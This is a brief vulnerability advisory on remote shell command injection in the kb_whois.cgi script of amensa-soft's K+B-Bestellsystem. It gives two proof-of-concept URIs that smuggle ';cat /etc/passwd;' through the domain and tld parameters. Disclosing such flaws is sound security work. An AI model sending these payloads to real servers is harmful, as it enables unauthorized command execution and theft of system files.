amensa-soft K+B-Bestellsystem KB_Whois.CGI Multiple Remote Shell Command Execution Vulnerabilities

amensa-soft K+B-Bestellsystem KB_Whois.CGI Multiple Remote Shell Command Execution Vulnerabilities

An attacker can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=